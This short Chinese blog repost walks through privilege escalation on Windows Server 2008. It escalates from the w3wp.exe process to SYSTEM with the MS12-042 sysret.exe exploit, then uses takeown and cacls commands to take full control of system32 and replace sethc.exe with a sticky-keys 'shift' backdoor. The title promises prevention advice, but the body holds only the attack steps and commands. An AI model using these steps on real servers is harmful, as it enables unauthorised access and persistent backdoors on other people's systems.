什么是提权_怎么防止服务器被渗透提权

大家好，又见面了，我是你们的朋友全栈君。

---

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

---

目录

Windows 2008 server提权之突破系统权限安装shift后门

0x01 前言

0x02 主要操作部分

0x03 主要命令组成部分

---

Windows 2008 server提权之突破系统权限安装shift后门0x01 前言

---

普通权限 我用的到时MS12042 这个大家都会用单独讲sysret.exe 拿出了 我们找到w3wp.exe这个PID 然后

我就就获得想要的权限了

提权后 system权限

0x02 主要操作部分

---

不能操作系统文件夹 我自己搭建的环境 先用administrator账号 测试

还是不能操作 我用到了2个命令 配合使用能赋予权限能执行 takeown /f c:\windows\system32\*.* /a /r /d y 将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令 在执行cacls c:\windows\system32\*.* /T /E /G administrators:F 目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制 然后系统文件夹权限

能替换sethcl了 问题也来了 只有管理员组能做了 权限 但是我们只有system权限 system权限依然不能操作 系统文件夹 我们将命令该成 cacls c:\windows\system32\*.* /T /E /G system:F 就能行了

0x03 主要命令组成部分

---

代码语言：javascript代码运行次数：0运行复制

    # 发现拒绝访问。    # 出现这样的情况我们就需要将将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令    takeown /f c:\windows\system32\*.* /a /r /d y       # 目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制    # 然后系统文件夹权限    cacls c:\windows\system32\*.* /T /E /G administrators:F       # 然后即可替换sethc了    # 可是只有管理员组才能执行权限 但是我们只有system权限 system权限依然不能操作 系统文件夹    # 我们将命令该成    cacls c:\windows\system32\*.* /T /E /G system:F

参考链接：

https://www.cnblogs.com/swyft/p/5491762.html

https://www.cnblogs.com/h4ck0ne/p/5154672.html

---

我不需要自由，只想背着她的梦

一步步向前走，她给的永远不重

---

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 举报，一经查实，本站将立刻删除。

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/193340.html原文链接：https://javaforall.cn